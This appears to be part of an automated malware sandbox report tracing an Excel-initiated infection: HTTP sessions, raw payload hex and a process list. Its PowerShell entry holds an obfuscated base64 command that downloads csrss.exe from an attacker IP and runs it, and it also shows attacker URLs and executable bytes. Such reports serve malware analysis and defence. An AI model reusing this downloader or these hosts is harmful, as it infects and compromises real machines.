                Jul 26, 2024 09:29:58.860368013 CEST | 616 | IN | HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:29:58 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LqIu%2FrL%2FRffzuybUVz1ozElaFAjJLK2%2FeU1lC7MBcOUQomv1migrRFZkuqg8nQwpd8jv%2F%2BtnQgtQ6uUqBiePgTHD3PJQXNH9N865lqTAjzu5F16mWng0MGGJ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92ae827ec14374-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.22 | 49166 | 91.92.245.100 | 80 | 3296 | C:\Windows\System32\mshta.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 26, 2024 09:29:58.880737066 CEST | 420 | OUT | GET /xampp/ebcd/eb/gdfvr.hta HTTP/1.1
                Accept: */*
                Accept-Language: en-US
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Range: bytes=8895-
                Connection: Keep-Alive
                Host: 91.92.245.100
                If-Range: "25ddd-61e14da080a28"
                Jul 26, 2024 09:29:59.517443895 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
                Date: Fri, 26 Jul 2024 07:29:59 GMT
                Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                Last-Modified: Thu, 25 Jul 2024 16:26:06 GMT
                ETag: "25ddd-61e14da080a28"
                Accept-Ranges: bytes
                Content-Length: 146206
                Content-Range: bytes 8895-155100/155101
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/hta
                Data Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 [TRUNCATED]
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%6E%58%42%46%55%45%6D%4D%52%58%4E%45%75%6C%73%4F%58%71%67%4E%46%58%45%72%65%64%54%52%53%71%53%67%42%53%4C%6A%41%44%4E%4F%56%6E%72%72%45%70%69%6F%4A%76%52%76%68%51%45%45%49%79%70%4B%50%4C%4E%58%77%65%6C%68%6F%73%67%44%57%56%66%50%54%72%71%62%58%6A%54%75%59%64%4A%4F%45%64%76%4D%7A%6A%4F%4B%4E%6F%63%74%7A%66%52%42%4C%45%65%55%43%41%72%76%43%6D%6E%45%73%53%76%73%49%7A%6E%54%6B%53%77%50%70%67%6D%4F%75%59%78%64%61%57%70%42%53%59%4D%52%6C%6E%5A%57%46%72%6F%4B%48%76%53%59%6B%54%6D%49%51%6D%50%6F%70%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:59.517467022 CEST | 1236 | IN | Data Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                Jul 26, 2024 09:29:59.517477989 CEST | 448 | IN | Data Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                Jul 26, 2024 09:29:59.517498970 CEST | 1236 | IN | Data Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                Jul 26, 2024 09:29:59.517513037 CEST | 1236 | IN | Data Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                Jul 26, 2024 09:29:59.517524004 CEST | 1236 | IN | Data Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                Jul 26, 2024 09:29:59.517585039 CEST | 1236 | IN | Data Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                Jul 26, 2024 09:29:59.517596960 CEST | 1236 | IN | Data Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                Jul 26, 2024 09:29:59.517606020 CEST | 1236 | IN | Data Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%5A%66%6D%51%54%73%68%77%6F%48%63%4C%49%57%65%65%77%70%6B%7A%6C%6A%59%63%6E%6D%48%4E%66%62%44%
                Jul 26, 2024 09:29:59.517616034 CEST | 1236 | IN | Data Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                Jul 26, 2024 09:29:59.522723913 CEST | 1236 | IN | Data Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.22 | 49167 | 107.173.143.46 | 80 | 3400 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 26, 2024 09:30:07.463278055 CEST | 337 | OUT | GET /T2507F/csrss.exe HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 107.173.143.46
                Connection: Keep-Alive
                Jul 26, 2024 09:30:07.961440086 CEST | 1236 | IN | HTTP/1.1 200 OK
                Date: Fri, 26 Jul 2024 07:30:07 GMT
                Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
                Last-Modified: Fri, 26 Jul 2024 06:04:08 GMT
                ETag: "28ca00-61e204785c600"
                Accept-Ranges: bytes
                Content-Length: 2673152
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/lnk
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 0f d7 18 24 6e b9 4b 24 6e b9 4b 24 6e b9 4b e7 ed ba 4a 2d 6e b9 4b e7 ed bd 4a 28 6e b9 4b e7 ed bc 4a 0a 6e b9 4b 2d 16 2a 4b 2a 6e b9 4b 6f 16 b8 4a 2d 6e b9 4b 24 6e b8 4b dc 6e b9 4b e5 12 ba 4a 2f 6e b9 4b e5 12 bc 4a 60 6e b9 4b 24 6e b9 4b 25 6e b9 4b 37 ea b9 4a 25 6e b9 4b 37 ea 46 4b 25 6e b9 4b 37 ea bb 4a 25 6e b9 4b 52 69 63 68 24 6e b9 4b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 6d d0 a2 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 84 13 00 00 42 15 00 00 f8 05 00 c0 8e 06 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 [TRUNCATED]
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`$nK$nK$nKJ-nKJ(nKJnK-*K*nKoJ-nK$nKnKJ/nKJ`nK$nK%nK7J%nK7FK%nK7J%nKRich$nKPEdmf"(B@/`%XH%0(&8/<P"T"("@0.texth `.managedq0r `hydrated`.rdata&HJ@@.data&"@.pdata8&:@@.rsrc0(.!@@.reloc</(@B
                Jul 26, 2024 09:30:07.961467028 CEST | 1236 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: HRHRyuHpHSHRyuHpHwSH`SyuHpHrSH[SyuHlpH}SHfSy
                Jul 26, 2024 09:30:07.961479902 CEST | 1236 | IN | Data Raw: 57 6c 0b 00 48 8d 05 40 f5 25 00 48 8b 00 48 8d 0d f6 4f 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 37 6c 0b 00 48 8d 05 28 f5 25 00 48 8b 00 48 8d 0d e6 4f 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 17 6c 0b 00 48 8d 05 10 f5 25 00 48 8b 00 48 8d 0d d6
                Data Ascii: WlH@%HHOyuH7lH(%HHOyuHlH%HHOyuHkH%HHOyuHkH%HHOyuHkH%HHOyuHkH%HHOyuHwkH%HHO
                Jul 26, 2024 09:30:07.961503983 CEST | 1236 | IN | Data Raw: 00 83 79 08 01 75 01 c3 48 8b d0 e9 77 67 0b 00 48 8d 05 d0 f2 25 00 48 8b 00 48 8d 0d d6 4e 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 57 67 0b 00 48 8d 05 d0 f2 25 00 48 8b 00 48 8d 0d de 4e 15 00 83 79 08 01 75 01 c3 48 8b d0 e9 37 67 0b 00 48 8d
                Data Ascii: yuHwgH%HHNyuHWgH%HHNyuH7gH%HHNyuHgH%HHNyuHfH%HHNyuHfHp%HHNyuHfHh%HHNyuHfH
                Jul 26, 2024 09:30:07.961515903 CEST | 1236 | IN | Data Raw: 07 00 4c 8d 05 8a b2 10 00 e9 55 ac 07 00 4c 8d 05 9e b5 10 00 e9 49 ac 07 00 4c 8d 05 d2 c2 10 00 e9 3d ac 07 00 4c 8d 05 66 ca 10 00 e9 31 ac 07 00 4c 8d 05 ca d7 10 00 e9 25 ac 07 00 4c 8d 05 be db 10 00 e9 19 ac 07 00 4c 8d 05 f2 ea 10 00 e9
                Data Ascii: LULIL=Lf1L%LLLFLZLLL$LLnLgLW[LdLWHL9L5LLM
                Jul 26, 2024 09:30:07.961527109 CEST | 1236 | IN | Data Raw: 85 c0 74 0b 80 39 00 80 3a 00 e9 e0 e5 06 00 48 8b c1 c3 66 66 66 66 0f 1f 84 00 00 00 00 00 4d 85 c0 74 0b 80 39 00 80 3a 00 e9 a0 11 00 00 48 8b c1 c3 66 66 66 66 0f 1f 84 00 00 00 00 00 4d 85 c0 74 0b 80 39 00 80 3a 00 e9 00 12 00 00 48 8b c1
                Data Ascii: t9:HffffMt9:HffffMt9:HffffMt9:HffffHH%H-I;f"&eL%XMIDAD;s$LKHtLA;PsIDHtW
                Jul 26, 2024 09:30:07.961539984 CEST | 1236 | IN | Data Raw: 00 42 80 3c 11 ff 74 18 42 c6 04 11 ff 48 c1 e9 0a 48 03 0d bb 51 26 00 80 39 ff 74 03 c6 01 ff c3 66 66 0f 1f 84 00 00 00 00 00 48 8b 0e 48 89 0f 48 3b 3d 73 51 26 00 72 69 48 3b 3d 72 51 26 00 73 60 4c 8b 1d 91 51 26 00 49 83 fb 00 74 14 4c 8b
                Data Ascii: B<tBHHQ&9tffHHH;=sQ&riH;=rQ&s`LQ&ItLIMA:uAH;%r6H;%s-HHL?Q&B<tBHH8Q&9tHHD1&eL%XOAML$LQHiLL\$A
                Jul 26, 2024 09:30:07.961589098 CEST | 1236 | IN | Data Raw: 88 00 00 00 0f 94 84 24 d0 00 00 00 f0 83 60 38 ef 49 8b 40 18 48 8b 18 49 8b 40 20 48 8b 28 49 8b 40 28 48 8b 30 49 8b 40 30 48 8b 38 49 8b 40 58 4c 8b 20 49 8b 40 60 4c 8b 28 49 8b 40 68 4c 8b 30 49 8b 40 70 4c 8b 38 66 41 0f 6f b0 90 00 00 00
                Data Ascii: $`8I@HI@ H(I@(H0I@0H8I@XL I@`L(I@hL0I@pL8fAofAofEofEofEofEofEofEofEofEo IHxH$ $(L$0H$HJpHtLJhIHBhHBpH$8M@x
                Jul 26, 2024 09:30:07.961601019 CEST | 1236 | IN | Data Raw: 79 49 8b 41 f8 48 89 42 f8 eb 6f 49 83 f8 20 72 41 4c 8b ca 4d 8b d0 4c 2b cb 49 c1 ea 05 0f 1f 44 00 00 48 8b 02 48 83 c2 20 48 89 01 49 8b 44 09 08 48 89 41 08 49 8b 44 09 10 48 89 41 10 4a 8b 44 09 18 48 89 41 18 48 83 c1 20 49 83 ea 01 75 d1
                Data Ascii: yIAHBoI rALML+IDHH HIDHAIDHAJDHAH IuAtHHHBHHAHAtHHH;G&H;}G&I=G&H|$0J<t&HLGHIL+HeG&I=H>G&LIHHL+H
                Jul 26, 2024 09:30:07.961611986 CEST | 1236 | IN | Data Raw: 75 ef 48 8b 15 4e 43 26 00 4c 8d 87 ff ff 1f 00 48 8b 7c 24 30 48 8b cb 48 c1 e9 15 49 c1 e8 15 4c 2b c1 48 03 d1 80 3a ff 74 03 c6 02 ff 48 ff c2 49 83 e8 01 75 ef 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c
                Data Ascii: uHNC&LH|$0HHIL+H:tHIuHH [H\$Ht$WH HH0HHHHAH"4HH3HtWH;uH3Hx(CH;=?&aHn"{HWE3HS
                Jul 26, 2024 09:30:07.966567993 CEST1236INData Raw: 00 84 c0 74 0d 33 d2 33 c9 44 8d 42 01 e8 a2 4f 06 00 48 8b cb 48 83 c4 20 5b e9 6c 27 00 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 74 24 20 57 48 83 ec 20 48 8b 01 49 8b f1 48 8d 4c 24 30 48 89 44 24 30 49 8b f8 8b da e8 e7 2f
                Data Ascii: t33DBOHH [l'H\$Ht$ WH HIHL$0HD$0I/,HLD$8tnL$8HH\$@H3HHt$HH _H\$WH H@2;/HH0thHHu{u{u{uCHK@<uy%uHcAHDH\$0H


Session ID: 5 | Source IP: 192.168.2.22 | Source Port: 49169 | Destination IP: 178.237.33.50 | Destination Port: 80 | PID: 3660 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jul 26, 2024 09:30:19.592058897 CEST | Bytes transferred: 71 | Direction: OUT
GET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
Timestamp: Jul 26, 2024 09:30:20.216634989 CEST | Bytes transferred: 1170 | Direction: IN
HTTP/1.1 200 OK
                date: Fri, 26 Jul 2024 07:30:20 GMT
                server: Apache
                content-length: 962
                content-type: application/json; charset=utf-8
                cache-control: public, max-age=300
                access-control-allow-origin: *
                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID: 6 | Source IP: 192.168.2.22 | Source Port: 49172 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 3828 | Process: C:\Windows\System32\mshta.exe
Timestamp: Jul 26, 2024 09:30:22.289392948 CEST | Bytes transferred: 344 | Direction: OUT
GET /jjJsPX HTTP/1.1
                Accept: */*
                Accept-Language: en-US
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: tny.wtf
                Connection: Keep-Alive
Timestamp: Jul 26, 2024 09:30:23.426986933 CEST | Bytes transferred: 608 | Direction: IN
HTTP/1.1 302 Found
                Date: Fri, 26 Jul 2024 07:30:23 GMT
                Transfer-Encoding: chunked
                Connection: keep-alive
                Location: http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
                X-Powered-By: ASP.NET
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTl6vqjMXS0Se1ergAjxKhzwPfM0KPVYmfECZ8LPWfnYaYvfbbkLbAka8BggID1VkIU7D94GIIQ6ISCCqOj131%2Fxx8WgPhdUsMznifPS6v8myzyNrNiV9EXp"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af1bfb7b8ce2-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Target ID:0
                Start time:03:29:33
                Start date:26/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13f240000
                File size:28'253'536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:4
                Start time:03:29:56
                Start date:26/07/2024
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\mshta.exe -Embedding
                Imagebase:0x13fda0000
                File size:13'824 bytes
                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:03:30:00
                Start date:26/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'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'+[CHAr]34+'))')))"
                Imagebase:0x4a820000
                File size:345'088 bytes
                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:03:30:00
                Start date:26/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
                Imagebase:0x13fa90000
                File size:443'392 bytes
                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:8
                Start time:03:30:05
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                Wow64 process (32bit):false
